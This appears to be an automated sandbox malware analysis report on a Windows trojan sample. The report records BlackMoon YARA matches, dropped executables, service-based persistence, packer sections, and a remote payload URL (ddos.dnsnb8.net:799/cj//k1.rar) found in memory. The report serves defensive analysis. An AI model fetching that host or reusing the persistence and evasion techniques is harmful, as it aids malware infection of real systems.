                  Source: VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145793925.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2146492689.000000000293A000.00000004.00000010.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
                  Source: VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar8T.
                  Source: VSFdoO.exe, 00000001.00000002.2146492689.000000000293A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarP
                  Source: VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarPTF
                  Source: VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarqT
                  Source: VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rart
                  Source: VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raru
                  Source: VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rary
                  Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
                  Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
                  Source: VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145793925.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
                  Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
                  Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_851ba796-7

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: Yara matchFile source: 0.2.LisectAVT_2403002B_48.exe.405218.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.LisectAVT_2403002B_48.exe.405218.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.LisectAVT_2403002B_48.exe.10000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.svchost.exe.1000b39c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.LisectAVT_2403002B_48.exe.1000b39c.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4147090865.0000000010113000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002B_48.exe PID: 6620, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6848, type: MEMORYSTR

                  Operating System Destruction

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Source: 0.2.LisectAVT_2403002B_48.exe.405218.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 2.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 0.2.LisectAVT_2403002B_48.exe.405218.1.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 0.2.LisectAVT_2403002B_48.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 2.2.svchost.exe.1000b39c.1.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 0.2.LisectAVT_2403002B_48.exe.1000b39c.3.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
                  Source: VSFdoO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Windows\SGuard.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00401E84 GetCurrentProcess,OpenProcess,LocalAlloc,NtQueryInformationProcess,LocalFree,CloseHandle,0_2_00401E84
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_1000602E GetCurrentProcess,OpenProcess,LocalAlloc,NtQueryInformationProcess,LocalFree,CloseHandle,0_2_1000602E
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_1000477D WTSGetActiveConsoleSessionId,74AE1930,DuplicateTokenEx,74727ED0,CreateProcessAsUserA,0_2_1000477D
                  Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SGuard.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B60761_2_000B6076
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B6D001_2_000B6D00
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\VSFdoO.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668
                  Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                  Source: LisectAVT_2403002B_48.exeBinary or memory string: OriginalFilename vs LisectAVT_2403002B_48.exe
                  Source: LisectAVT_2403002B_48.exe, 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSGuard.exe4 vs LisectAVT_2403002B_48.exe
                  Source: LisectAVT_2403002B_48.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                  Source: 0.2.LisectAVT_2403002B_48.exe.405218.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 2.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 0.2.LisectAVT_2403002B_48.exe.405218.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 0.2.LisectAVT_2403002B_48.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 2.2.svchost.exe.1000b39c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: 0.2.LisectAVT_2403002B_48.exe.1000b39c.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                  Source: VSFdoO.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSFdoO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSFdoO.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: LisectAVT_2403002B_48.exeStatic PE information: Section: .MPRESS1 ZLIB complexity 1.000313442138219
                  Source: classification engineClassification label: mal100.rans.spre.troj.evad.mine.winEXE@14/19@67/4
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_000B119F
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,0_2_100011BB
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_10006649 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,FindCloseChangeNotification,0_2_10006649
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_004010DF LoadLibraryA,GetProcAddress,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_004010DF
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_1000626A ServiceMain,StartServiceCtrlDispatcherA,0_2_1000626A
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeFile created: C:\Users\user\AppData\Roaming\winoshelper.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6668
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeFile created: C:\Users\user\AppData\Local\Temp\VSFdoO.exeJump to behavior
                  Source: C:\Windows\SGuard.exeFile read: C:\Program Files\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe "C:\Users\user\Desktop\LisectAVT_2403002B_48.exe"
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeProcess created: C:\Users\user\AppData\Local\Temp\VSFdoO.exe C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k NetworkService -s WinOSHelper
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SGuard.exe -Embedding
                  Source: C:\Windows\SGuard.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeProcess created: C:\Users\user\AppData\Local\Temp\VSFdoO.exe C:\Users\user\AppData\Local\Temp\VSFdoO.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SGuard.exe -EmbeddingJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: ntvdm64.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SGuard.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Google Chrome.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                  Source: Internet Explorer.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Internet Explorer\iexplore.exe
                  Source: Google Chrome.lnk0.3.drLNK file: ..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                  Source: Microsoft Edge.lnk.3.drLNK file: ..\..\..\..\..\..\..\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: LisectAVT_2403002B_48.exeStatic file information: File size 1133568 > 1048576
                  Source: LisectAVT_2403002B_48.exeStatic PE information: Raw size of .MPRESS1 is bigger than: 0x100000 < 0x10d800
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeUnpacked PE file: 0.2.LisectAVT_2403002B_48.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W;Tu3:EW; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;Tu3:EW;
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeUnpacked PE file: 1.2.VSFdoO.exe.b0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_004010DF LoadLibraryA,GetProcAddress,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_004010DF
                  Source: initial sampleStatic PE information: section where entry point is pointing to: Tu3
                  Source: LisectAVT_2403002B_48.exeStatic PE information: section name: .MPRESS1
                  Source: LisectAVT_2403002B_48.exeStatic PE information: section name: .MPRESS2
                  Source: LisectAVT_2403002B_48.exeStatic PE information: section name: Tu3
                  Source: VSFdoO.exe.0.drStatic PE information: section name: .aspack
                  Source: VSFdoO.exe.0.drStatic PE information: section name: .adata
                  Source: winoshelper.dll.0.drStatic PE information: section name: UPX2
                  Source: MyProg.exe.1.drStatic PE information: section name: PELIB
                  Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
                  Source: SciTE.exe.1.drStatic PE information: section name: u
                  Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00405C53 pushfd ; retf 0_2_00405C7B
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00405C7C pushfd ; retf 0_2_00405C7B
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00408819 push es; iretd 0_2_0040888B
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00408268 push cs; retf 0_2_00408273
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00408275 push cs; retf 0_2_00408273
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00408275 push edx; ret 0_2_004082F2
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00408B28 push cs; iretd 0_2_00408B34
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00405F33 push es; retf 0_2_00405F55
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_004063FA push cs; retf 0_2_004063FB
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_004063A3 pushfd ; iretd 0_2_004063A7
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_004087B6 push es; iretd 0_2_0040888B
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100EB00B push es; iretd 0_2_100EB02C
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100EAC54 push es; iretd 0_2_100EAC55
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100E8871 push es; ret 0_2_100E8874
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100EAE73 push esi; iretd 0_2_100EAE74
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100EC725 push edx; iretd 0_2_100EC727
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100EBB32 push ecx; ret 0_2_100EBB3F
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100E97AE pushfd ; iretd 0_2_100E97C2
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100E97C4 push es; iretd 0_2_100E97C7
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100E8FF6 push es; retf 0_2_100E8FF8
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B1638 push dword ptr [000B3084h]; ret 1_2_000B170E
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B600A push ebp; ret 1_2_000B600D
